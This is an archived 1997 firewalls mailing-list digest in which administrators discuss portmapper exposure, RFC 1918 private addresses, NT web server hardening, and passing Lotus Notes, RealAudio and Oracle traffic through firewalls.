1997 06:41:17 -0800 (PST) Received: from loach.cichlid.com (loach.cichlid.com [165.227.20.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id GAA05602 for ; Fri, 10 Jan 1997 06:41:03 -0800 (PST) Received: (from news@localhost) by loach.cichlid.com (8.7.4/8.7.3) id GAA02978; Fri, 10 Jan 1997 06:37:32 -0800 To: firewalls@GreatCircle.COM Path: cichlid From: robin.pollard@mail.ing.nl Newsgroups: mail.firewalls Subject: None Date: 10 Jan 1997 06:37:27 -0800 Lines: 59 Message-ID: <5b5k77$q5f@cichlid.cichlid.com> NNTP-Posting-Host: cichlid.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Message-ID: <0aebc6ee839d9c87@deliver.cichlid.com> Lines: 49 Xdeliver: processed on Fri Jan 10 06:37:21 PST 1997 Xdeliver: SENDER firewalls-owner@greatcircle.com Xdeliver: to Xdeliver: cc Xdeliver: apparent_to Xdeliver: from robin.pollard@mail.ing.nl X400-Originator: Robin.Pollard@mail.ing.nl X400-Recipients: firewalls@greatcircle.com X400-Mts-Identifier: [/PRMD=ING GROEP/ADMD=400NET/C=NL/;0013700002238963000002] X400-Content-Type: P2-1988 (22) Message-Id: <0013700002238963000002*@MHS> To: firewalls Subject: A simple firewall requirement ? Date: Fri, 10 Jan 1997 15:04:59 +0000 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am looking at ways to provide global access to our internal mail system (cc:Mail) for mobile users. We have cc:Mail "post offices" where user mail is stored at various offices throughout the globe, all linked to a central hub here via our own VPN (TCP/IP). The remote users need to be able to make a (TCP/IP) connection from their laptop into the VPN and down to their PO to get mail. We have access to X28 access points in most of the world. I was thinking of a PPP dialup machine here, (accessed via X28), that will route packets from a limited number of IP addresses (The mobile users) to the IP addresses of the mail PO's only on the port cc:Mail uses (cc0) all else is of course excluded. Lotus claim cc:Mail sends all it's traffic well encrypted but keep the algorithm secret :) we trust the network provider enough to be happy with this. What sort of hardware can do this, will a single box Linux solution do or can it not filter in that detail ? The PPP point is exposed to the world (or anyone who hacks our network provider) what attacks is it open to? Should the PPP box sit outside another filtering router incase it is compromised or can it be locked down tight with such limited requirements. Any big holes I should be aware of ? TIA, Robin Pollard Infrastructure Support ING Bank International robin.pollard@mail.ing.nl From firewalls-owner Fri Jan 10 07:29:32 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA07972 for firewalls-outgoing; Fri, 10 Jan 1997 07:06:10 -0800 (PST) Received: from apu.connectix.com (apu.connectix.com [207.82.225.42]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id HAA07962 for ; Fri, 10 Jan 1997 07:06:03 -0800 (PST) Received: from santa.connectix.com ([207.82.227.76]) by apu.connectix.com (8.8.3/8.6.9) with SMTP id IAA16747; Fri, 10 Jan 1997 08:08:06 -0800 Date: Fri, 10 Jan 1997 08:08:06 -0800 Message-Id: <199701101608.IAA16747@apu.connectix.com> X-Sender: sansom@flanders.connectix.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: GARY.MILLS@TRW.COM From: Rob Sansom Subject: Re: RCP tcp/udp 111 Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Wow, I'm actually posting, and breaking my New Years resolution not to write email first thing in the morning... RPC Portmapper. Very bad to allow people to connect to this, since they can find out what sorts of RPC services you run on your host (if I'm correct). At 04:34 PM 1/8/97 -0800, you wrote: >Can anyone comment on the security of rcp >tcp/udp port 111. > >Regards, >Gary, Gary Mills@experian.com > > > From firewalls-owner Fri Jan 10 08:07:14 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA12674 for firewalls-outgoing; Fri, 10 Jan 1997 07:49:36 -0800 (PST) Received: from ginger.vnet.net (ginger.vnet.net [166.82.1.69]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id HAA12621 for ; Fri, 10 Jan 1997 07:49:18 -0800 (PST) Received: from galip (galip.vnet.net [166.82.174.200]) by ginger.vnet.net (8.8.4/8.8.2) with SMTP id KAA22146; Fri, 10 Jan 1997 10:49:36 -0500 (EST) Message-ID: <32D66418.6E3B@hon.com> Date: Fri, 10 Jan 1997 10:45:28 -0500 From: Steve Gallipeau Reply-To: Steve@hon.com Organization: Team OS/2 X-Mailer: Mozilla 3.01Gold (WinNT; I) MIME-Version: 1.0 To: Michael Brennen CC: "Steven E. Matkoski" , Firewalls Mailing List Subject: Re: registered IP addresses? References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Michael Brennen wrote: > > RFC 1918. > > -- Michael (mbrennen@fni.com) > > On Thu, 9 Jan 1997, Steven E. Matkoski wrote: > > > Does someone know what the registered IP addresses are that should be > > used for internal networks. These are the addresses that are not routed > > to the Internet. or even the RFC#? I believe you can use 192.168.xxx.xxx and 10.10.xxx.xxx Steve From firewalls-owner Fri Jan 10 08:33:43 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA12714 for firewalls-outgoing; Fri, 10 Jan 1997 07:50:00 -0800 (PST) Received: from grommit.magnet.com (grommit.magnet.com [208.192.183.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id HAA12689 for ; Fri, 10 Jan 1997 07:49:46 -0800 (PST) Received: by grommit.magnet.com (951211.SGI.8.6.12.PATCH1042/Magnet) id KAA25645; Fri, 10 Jan 1997 10:49:31 -0500 Received: from lemur.magnet.com(208.192.178.2) by grommit.magnet.com via smap (3.1) id xma025643; Fri, 10 Jan 97 10:49:11 -0500 Received: from localhost (pauld@localhost) by lemur.magnet.com (8.8.3/MAGNET) with SMTP id KAA24641; Fri, 10 Jan 1997 10:49:10 -0500 (EST) Date: Fri, 10 Jan 1997 10:49:10 -0500 (EST) From: Paul Danckaert To: Rob Sansom cc: GARY.MILLS@TRW.COM, firewalls@GreatCircle.COM Subject: Re: RCP tcp/udp 111 In-Reply-To: <199701101608.IAA16747@apu.connectix.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 10 Jan 1997, Rob Sansom wrote: > Wow, I'm actually posting, and breaking my New Years resolution not to write > email first thing in the morning... > > RPC Portmapper. Very bad to allow people to connect to this, since they can > find out what sorts of RPC services you run on your host (if I'm correct). Just to add a comment to this... its true that allowing lots of people to connect to the portmapper is bad, but I think that people get a false sense of security by either blocking portmap connections, or by running a portmapper in a restricted mode. As portmap simply provides you with an easy way to find the RPC service you are looking for, its a trivial block to get around. Simply connecting to the ports within normal RPC service ranges and identifying services on ports will give you exactly the same information that portmap does.. it just takes slightly longer. My overall recomendation is to block connections to many of those ports, either at a router, firewall.. or on the machine itself. Many OSes have built-in support for packet filtering.. make use of it. (ipfilter, ipfilterd, ipfw, screend, etc..) Also, consider if you need to run any of these services in the first place? If you have a machine that is a stand alone server, turn it off, and disable any rpc services running. Then you don't need to worry about it.. paul From firewalls-owner Fri Jan 10 09:02:58 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA15277 for firewalls-outgoing; Fri, 10 Jan 1997 08:21:29 -0800 (PST) Received: from geocities.com (mail2.geocities.com [204.7.246.132]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id IAA15270 for ; Fri, 10 Jan 1997 08:21:21 -0800 (PST) Received: from 193.230.255.2.flex.ro (dial03.flex.ro [193.230.255.103]) by geocities.com (8.7.5/8.7.3) with ESMTP id IAA19160; Fri, 10 Jan 1997 08:20:25 -0800 (PST) Message-Id: <199701101620.IAA19160@geocities.com> From: "Gabriel Dura" To: "mike" Cc: Subject: Re: FW-1 hacked? - Reply Date: Fri, 10 Jan 1997 18:10:56 +0200 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk There is a guy, working on his own, who claims he knows how to penetrate FBI's firewall. As a proof I was told that behind the firewall there is there is another computer 'phi.fbi.gov'. In the case of me being correctly informed and FBI is using FW-1 you have an answer. Hope it helps, Gabriel Dura dura@geocities.com P.S. I can not guarantee the accuracy of this information and I can not reveal the person who told me. ---------- > From: mike > To: firewalls@GreatCircle.COM > Subject: FW-1 hacked? > Date: miercuri, ianuarie 08, 1997 16:27 > Hi all Does anyone know if FW-1 was ever hacked? From firewalls-owner Fri Jan 10 09:43:23 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA17799 for firewalls-outgoing; Fri, 10 Jan 1997 08:59:46 -0800 (PST) Received: from haleakala.aloha.net (haleakala.aloha.net [204.94.112.33]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id IAA17698 for ; Fri, 10 Jan 1997 08:59:20 -0800 (PST) Received: from localhost (samc@localhost) by haleakala.aloha.net (8.7.5/8.6.9) with SMTP id GAA18260; Fri, 10 Jan 1997 06:59:03 -1000 (HST) Date: Fri, 10 Jan 1997 06:59:03 -1000 (HST) From: Sam Chepkevich To: uscny8hb@ibmmail.com cc: Firewalls Mailing List Subject: Re: registered IP addresses? In-Reply-To: <32D5061F.2F66@dreamscape.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk A - 10.0.0.0 B - 172.16.0.0 - 172.31.255.255 C - 192.168.0.0 ---------------------------------- Sam Chepkevich samc@aloha.net Manager Systems Engineering (Hawaii) Hawaii OnLine/GST Internet ---------------------------------- On Thu, 9 Jan 1997, Steven E. Matkoski wrote: > Does someone know what the registered IP addresses are that should be > used for internal networks. These are the addresses that are not routed > to the Internet. or even the RFC#? > > -- > Thanks! > -steve. > matkoski@dreamscape.com > From firewalls-owner Fri Jan 10 09:44:37 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA17544 for firewalls-outgoing; Fri, 10 Jan 1997 08:58:05 -0800 (PST) Received: from arden.iss.net (arden.iss.net [204.241.60.8]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id IAA17526 for ; Fri, 10 Jan 1997 08:57:56 -0800 (PST) Received: from localhost (davem@localhost) by arden.iss.net (8.8.4/8.7.3) with SMTP id MAA27271; Fri, 10 Jan 1997 12:59:29 -0500 X-Authentication-Warning: arden.iss.net: davem owned process doing -bs Date: Fri, 10 Jan 1997 12:59:29 -0500 (EST) From: "David J. Meltzer" To: Rob Sansom cc: firewalls@GreatCircle.COM Subject: Re: RCP tcp/udp 111 In-Reply-To: <199701101608.IAA16747@apu.connectix.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Fri, 10 Jan 1997, Rob Sansom wrote: > > RPC Portmapper. Very bad to allow people to connect to this, since they can > find out what sorts of RPC services you run on your host (if I'm correct). > > At 04:34 PM 1/8/97 -0800, you wrote: > >Can anyone comment on the security of rcp > >tcp/udp port 111. > > That is certainly a true statement, but by blocking access to the portmap service alone, you are really not preventing anyone from achieving the same results. It is quite feasible to do a UDP scan for RPC services and by looking at the resulting RPC replies build up a list that is identical to what the portmapper will return. -Dave --------------------------------+--------------------- David J. Meltzer | Email: davem@iss.net Systems Engineer | Web: www.iss.net Internet Security Systems, Inc. | Fax: (770)395-1972 From firewalls-owner Fri Jan 10 10:09:18 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA21904 for firewalls-outgoing; Fri, 10 Jan 1997 09:45:19 -0800 (PST) Received: from www.steldyn.com (www.steldyn.com [198.68.45.121]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id JAA21834 for ; Fri, 10 Jan 1997 09:44:49 -0800 (PST) Received: from juneau.steldyn.com (172.16.31.1) by www.steldyn.com (EMWAC SMTPRS 0.81) with SMTP id ; Fri, 10 Jan 1997 10:51:42 -0700 Received: by juneau.steldyn.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBFEE3.596B5BE0@juneau.steldyn.com>; Fri, 10 Jan 1997 10:45:09 -0700 Message-ID: From: Chris Pugrud To: "'Cary Conover(IS) 13897'" Cc: Firewalls Mailing list , "'Franke Albert 2 Lt USAFE CSS/SCBS'" Subject: Security in Depth for a NT 4.0 Web Server Date: Fri, 10 Jan 1997 10:45:07 -0700 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I realize that the question was in regards to a public webserver on a .mil LAN. The part that I responded was just of how to establish in-depth security on a NT 4.0 webserver, which I felt would be of general interest to the list. I am very aware of the situation of military LAN topology and security procedure. I just responded to a general request for advice. I appreciate the note, but it has been amazing how many e-mails I have received about contacting the appropriate INFOSEC group. The problem really stems from people setting up web servers that do not a have an INFOSEC background. I think if we look around we will find that this is web wide problem, not just a military one. Chris >-----Original Message----- >From: Cary Conover(IS) 13897 [SMTP:cconov@exp2.is.xpark.pmh.org] >Sent: Thursday, January 09, 1997 7:22 AM >To: Chris Pugrud >Cc: Firewalls Mailing list; 'Franke Albert 2 Lt USAFE CSS/SCBS' >Subject: Re: I DON'T HAVE FUNDING FOR A FIREWALL...HELP!!! > >Chris Pugrud wrote: >> >> This really as not as bad of a situation as it seems. Here are a few >> pointers to vastly increasing the security of the system. This is not >> the be all or end all of security. I am sure that there are more steps >> that you can take to increase your security even more. Buyer Beware. >> Your mileage may vary... >> >> Apply sp2 for Windows NT 4.0 >> SP2 fixes several bugs in the OS and IIS >> http://www.microsoft.com/ntserversupport/Default-SL.HTM >> >> The machine really should be used only for serving web pages. If you >> can dedicate a singular machine, even a 486, to just tossing HTTP then >> you can greatly increase the security. >> Under Control Panel > Services, Only the following MUST be running for >> a web server: >> EventLog >> FTP Publishing Service (optional) >> Plug and Play (NT 4.0) >> Workstation >> World Wide Web Publishing Service >> Only these services should be set "Automatic". All other services >> should be set "manual." Be careful, your mileage may vary... >> >> Use IIS security >> IIS has some built in allow/deny filtering based on IP address >> Internet Service Manager > WWW Service Properties > Advanced TAB >> >> CGI/BIN is BAD (by default) >> Remove scripts and the HTML Administrator if installed >> Internet Service Manager > Directories >> Ideally only "C:\InetPub\wwwroot" "" is listed. Remove all >> others, especially any that you can not identify. >> While you are there make sure to go to "logging" and set up logs >> Also go c:\InetPub and set security >> NT Explorer > C:\InetPub > right click > properties > security > >> permissions >> Replace Permissions on Subdirectories >> Replace Permissions on Existing Files >> Make Everyone Read (RX)(RX) >> Make Administrator Full Control (All)(All) >> Remove all others >> This sets things up so that only the administrator can make changes >> and they must be made from the machine. >> >> Use the OS security >> NT 4.0 has basic packet filtering built in >> Control Panel > Network > Protocols > TCP/IP > Properties > IP Address >> > Advanced > Enable Security > Configure >> Permit Only (TCP Ports) > Add > 80 (http) >> Permit Only (UDP Ports) > (leave blank) >> Permit Only (IP Protocols) > Add > 6 (TCP) >> This really cuts down what the machine can do. If you need to surf >> from the machine you may need to add 53 to UDP Ports. >> While you in the control panel, also check your bindings: >> Control Panel > Network > Bindings > Show Bindings for "all >> protocols." >> Make sure that "TCP/IP" is Enabled >> Disable all others >> Show bindings for "all adapters" >> Expand the adapter (click the plus box) >> Expand WINS Client >> You may need to Enable Workstation If the networking will not start >>on >> reboot >> If you do, make sure to disable server and NetBIOS Interface >> Restart your computer >> >> Good day and Good luck >> >> Chris >> >> >-----Original Message----- >> >From: Franke Albert 2 Lt USAFE CSS/SCBS >>[SMTP:albert.franke@ramstein.af.mil] >> >Sent: Wednesday, January 08, 1997 3:52 AM >> >To: Firewalls Mailing list >> >Subject: I DON'T HAVE FUNDING FOR A FIREWALL...HELP!!! >> > >> >I am responsible for securing (as well as I can) a DEC Alpha running >> >Windows NT 4.0 and Internet Information Server as our WWW Server. It is >> >sitting as a node on our LAN and everyone in the world can access it. I >> >want a program that I can run on it that will allow/disallow blocks of >> >IP addresses such as 132.244 or .AF.MIL only. Also, I would like (but >> >not as necessary) it to keep detailed logs. I have heard of O'Reiley's >> >WebSite, but I don't know if this will do. I do not have funding for an >> >expensive firewall machine, and it is impracticle to add routers into >> >our LAN. Please help if you have any suggestions. Thanks. >> > >> >albert.franke@ramstein.af.mil >> >Albert E. Franke, 2Lt, USAF >> >OIC, USAFE Web Tech Support 480-7905 > >I don't know if you folks caught this or not. He is on a LAN on a >fairly large Air Force Base in Germany. This means not only is his >Website open to attack so are many of the bases computer systems. It >appears that there are larger issues here than meet the eye. > >His Security Squadron should be involved as well as the Communications >Squadron that is stationed on the base. > >With the military it takes a long while to get anything done unless you >do it yourself on a shoe string. The money comes from above once a year >in a budget process that is antiquated and very slow to adjust to >change. This is one area that changes on as frequent as an hour to hour >basis. > >There are initiatives going out from the Pentagon to do things about >this and the President himself has even put out the word to Secure the >Military Systems. However the priority in the field is not on Securing >the Sites. It is on keeping the job they presently have. They are in >the one mistake and your out of the game military. I wish Albert luck. >Hopefully he can get the Base Commanders Attention so that the Comm >Squadron will put in a Firewall at the access point to the internet on >the base. Otherwise the whole base's security on their network is >suspect. > >On the other hand there could be security in place and he just is not >aware that it is there. Chances are the previous is the case. > >-- >Cary From firewalls-owner Fri Jan 10 10:14:20 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA23384 for firewalls-outgoing; Fri, 10 Jan 1997 10:02:36 -0800 (PST) Received: from linda.if.is (linda.if.is [193.4.185.193]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id KAA23348 for ; Fri, 10 Jan 1997 10:01:55 -0800 (PST) Received: from ilmur.if.is by linda.if.is (Secure/IFnet/18-11-96); Fri, 10 Jan 1997 18:01:32 GMT Received: by ilmur.if.is (Secure/IFnet/09-12-96); Fri, 10 Jan 1997 18:01:29 GMT From: gunni@if.is (Gunnar Ingvi Thorisson) Message-Id: <199701101801.SAA05841@ilmur.if.is> Subject: TCP/IP encrypted connection To: firewalls@GreatCircle.com Date: Fri, 10 Jan 1997 18:01:29 +0000 (GMT) X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm looking for a good way to transfer TCP/IP data between two Networks (two countries) safe and secure ower the Internet. Maybe a router which is cabable of crypting outgoing packets addressed to certain networks? Any ideas would be appreciated. Thanks and best regards, a reply would be greatly appreciated. Gunnar Ingvi Thorisson Iceland Software Inc. CODA Iceland Inc. gunni@if.is, gunni@coda.is From firewalls-owner Fri Jan 10 10:52:11 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA23334 for firewalls-outgoing; Fri, 10 Jan 1997 10:01:37 -0800 (PST) Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id KAA23241 for ; Fri, 10 Jan 1997 10:00:49 -0800 (PST) Received: from disney.sybase.com (sybgate.sybase.com [130.214.88.21]) by halon.sybase.com (8.8.4/8.8.4) with ESMTP id KAA20380 for ; Fri, 10 Jan 1997 10:02:49 -0800 (PST) Received: from notesgw2.sybase.com (notesgw2 [130.214.231.107]) by disney.sybase.com (8.8.4/8.8.4) with ESMTP id KAA11414 for ; Fri, 10 Jan 1997 10:00:28 -0800 (PST) Received: (from unixsvr1@localhost) by notesgw2.sybase.com (8.8.4/8.8.4) id KAA26710 for @sybgate.sybase.com:firewalls@GreatCircle.COM; Fri, 10 Jan 1997 10:00:20 -0800 (PST) Message-Id: <199701101800.KAA26710@notesgw2.sybase.com> Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id 89ECE117E7E63A828825641B00633CB6; Fri, 10 Jan 97 10:00:19 EDT To: "Cihan Subasi (Garanti Tic)" cc: firewall From: Ryan Russell/SYBASE Date: 10 Jan 97 10:05:02 EDT Subject: Re: RealAudio clients behind the FW... X-Lotus-Type: Reply All MIME-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We'll need just a little more detail about your firewall... such as, what kind do you have? Does it work if you do TCP instead of UDP? (Yes, I know you may not want to keep it that way...this is for testing purposes.) Ryan ---------- Previous Message ---------- To: firewalls cc: From: CihanS @ garanti.com.tr ("Cihan Subasi (Garanti Tic)") @ smtp Date: 01/10/97 03:32:00 PM Subject: RealAudio clients behind the FW... I'm having problems configuring FW to allow RealAudio packets...Port 7070 seems open but data transmission on a UDP port do not occur...Please help.... Thanks Cihan From firewalls-owner Fri Jan 10 12:08:19 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA02585 for firewalls-outgoing; Fri, 10 Jan 1997 11:34:30 -0800 (PST) Received: from mailgate.Cadence.COM (mailgate.Cadence.COM [158.140.2.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id LAA02538 for ; Fri, 10 Jan 1997 11:34:08 -0800 (PST) Received: (from smap@localhost) by mailgate.Cadence.COM (8.6.8/8.6.8) id LAA17592; Fri, 10 Jan 1997 11:33:52 -0800 Received: from smcc5.cadence.com(158.140.32.98) by mailgate.Cadence.COM via smap (V1.0mjr) id sma852924831.017588; Fri Jan 10 11:33:51 1997 Received: (from lsuto@localhost) by smcc5.Cadence.COM (8.6.8/8.6.8) id LAA18177; Fri, 10 Jan 1997 11:33:50 -0800 Date: Fri, 10 Jan 1997 11:33:50 -0800 From: Lawrence Suto Message-Id: <199701101933.LAA18177@smcc5.Cadence.COM> To: gunni@if.is Subject: Re: TCP/IP encrypted connection Cc: firewalls@GreatCircle.COM X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Take a look at the NetFortress from Digital Secured Networks. It is a powerful device which encrypts the entire TCP packet including the headers. They can be found at http://www.dsnt.com -Larry Suto From firewalls-owner Fri Jan 10 12:10:18 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA00512 for firewalls-outgoing; Fri, 10 Jan 1997 11:08:26 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id LAA00381 for firewalls@greatcircle.com; Fri, 10 Jan 1997 11:07:38 -0800 (PST) Received: from csnnetra1 ([200.255.165.102]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id IAA21374 for ; Thu, 9 Jan 1997 08:38:10 -0800 (PST) Received: from mg65.csn.com.br by csnnetra1 (SMI-8.6/SMI-SVR4) id OAA12986; Thu, 9 Jan 1997 14:36:46 -0200 Message-Id: <199701091636.OAA12986@csnnetra1> Comments: Authenticated sender is From: "Alessandro Jannuzzi" To: firewalls@GreatCircle.com Date: Thu, 9 Jan 1997 14:36:15 +0000 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Two port addresses for one service X-mailer: Pegasus Mail for Win32 (v2.42a) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Dear people, Could someone tell me if is possible to bind two port addresses for one single service on Solstice Firewall 2.0 ? I really thanks in advance . . . Alessandro Jannuzzi jannuzzi@csn.com.br From firewalls-owner Fri Jan 10 12:20:31 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA01908 for firewalls-outgoing; Fri, 10 Jan 1997 11:29:06 -0800 (PST) Received: from bastion.mpact.net (bastion.mpact.net [199.84.155.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id LAA01888 for ; Fri, 10 Jan 1997 11:28:44 -0800 (PST) From: PLAMONDON-A@immedia.ca Received: from immedia.ca (immedia.ca [192.139.197.1]) by bastion.mpact.net (8.7.5/8.7.3) with SMTP id OAA18006 for ; Fri, 10 Jan 1997 14:28:08 -0500 (EST) Received: by immedia.ca (4.13/2.D) id AA7481; 10 Jan 97 19:27:05 +0000 Date: 10 Jan 97 19:25:00 +0000 Message-Id: <199701101927.AA7481@immedia.ca> To: firewalls@greatcircle.com Subject: F-suivre : cancel Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Please cancel plamondon-a@immedia.ca ----- Message original ----- ================================================================================ A: RNET (FIREWALLS@GREATCIRCLE.COM) PLAMONDON-A De: RNET (jjvaz@ibm.net) Objet: cancel Date: 01/ 9/97 Heure: 11:56:00AM EST Formulaire: MAIL Livraison: Normal ================================================================================ Please cancel... jjvaz@ibm.net Thanks From firewalls-owner Fri Jan 10 12:30:04 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA00393 for firewalls-outgoing; Fri, 10 Jan 1997 11:07:42 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id LAA00328 for firewalls@greatcircle.com; Fri, 10 Jan 1997 11:07:22 -0800 (PST) Received: from usanetworks.com (icarus.usanetworks.com [204.178.38.10]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id IAA20115 for ; Thu, 9 Jan 1997 08:12:35 -0800 (PST) Received: from koguma (alpha.usanetworks.com) by usanetworks.com (5.x/SMI-SVR4) id AA02103; Thu, 9 Jan 1997 11:15:03 -0500 Message-Id: <2.2.32.19970109161037.00bf5620@icarus.usanetworks.com> X-Sender: alex@icarus.usanetworks.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 09 Jan 1997 11:10:37 -0500 To: firewalls@GreatCircle.com From: Alexey Zilber Subject: Rom based os/web server? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I recieved the previous months copy of The Linux Journal (yes, yes, I know.. :-) ). And it talks about a rom based stripped down version of Linux that's been created, for systems that cannot use components that could be damaged from stress (like hardrives). This thing is stored, compressed in rom, then gets booted and uncompressed into ram. This thing might be good for a hard-coded webserver. While it could get hacked, a reboot and a password change should be all that's needed to repair it. Alex From firewalls-owner Fri Jan 10 12:30:38 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA28357 for firewalls-outgoing; Fri, 10 Jan 1997 10:54:13 -0800 (PST) Received: from trem.cnt.org.br (desvio.cnt.org.br [200.19.123.2]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id KAA28145 for ; Fri, 10 Jan 1997 10:53:06 -0800 (PST) Received: by trem.cnt.org.br (AIX 3.2/UCB 5.64/4.03) id AA10183; Fri, 10 Jan 1997 16:24:13 -0300 From: ormonde@trem.cnt.org.br (Rodrigo Ormonde) Message-Id: <9701101924.AA10183@trem.cnt.org.br> Subject: Re: Notes through Firewall 1, the Dawg To: fangyou2@panix.com (FaNgYoU2) Date: Fri, 10 Jan 1997 16:24:13 -0300 (GRNLNDST) Cc: firewalls@greatcircle.com In-Reply-To: from "FaNgYoU2" at Jan 9, 97 10:04:39 pm X-Mailer: ELM [version 2.4 PL24] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Uno. I need to set up a dumb Firewall-1 machine to permit Lotus Notes to > run on an Intranet. The Notes Admin is sure that Notes can run on just a > single port. What my equipment showed when I looked at Notes previously > was that it made a connection on one port, a response came back on a > different but very close port, some sort of handshake took place and the > real data transfer started up on a third port. Is it true that Notes can > be made to run on a single port through a firewall? Yes. Lotus Notes uses only port 1352/TCP for all its services, including e-mail and replications. We use it here behind a firewall, with just this port opened, and it runs perfectly fine. -- Rodrigo de La Rocque Ormonde e-mail: ormonde@cnt.org.br PGP Public key: finger ormonde@cnt.org.br From firewalls-owner Fri Jan 10 12:35:50 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA00324 for firewalls-outgoing; Fri, 10 Jan 1997 11:07:21 -0800 (PST) Received: (mcb@localhost) by miles.greatcircle.com (8.7.4/Miles-960830-1) id LAA00296 for firewalls@greatcircle.com; Fri, 10 Jan 1997 11:07:12 -0800 (PST) Received: from lexicon.ins.com (lexicon.ins.com [199.0.193.11]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id HAA17587 for ; Thu, 9 Jan 1997 07:14:57 -0800 (PST) Received: from martin_d.cci.cox.com ([206.98.143.200]) by lexicon.ins.com (8.7.5/8.7.3) with SMTP id HAA25831 for ; Thu, 9 Jan 1997 07:14:41 -0800 (PST) Message-Id: <3.0.32.19970109101401.00695124@lexicon.ins.com> X-Sender: martin_d@lexicon.ins.com X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Thu, 09 Jan 1997 10:14:32 -0500 To: firewalls@greatcircle.com From: "Darwin L. Martinez" Subject: Oracle Timeout Problem Thru FW-1 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk All: A remote client is running FW-1 (2.1b) on a Sun Sparc. They are experiencing a problem where their HP servers / Oracle sessions are timing out after 15 minutes of inactivity. The TCP session timeout parameter is set to 7200 sec, so I don't think this is a problem. They are using a Telnet session (via Rumba95) to access the HP servers. They are also utilizing NAT. I thought that I recalled an issue related to HPUX / Oracle / FW-1, but can't find it (if it even existed) anywhere. Any ideas? Thanks. 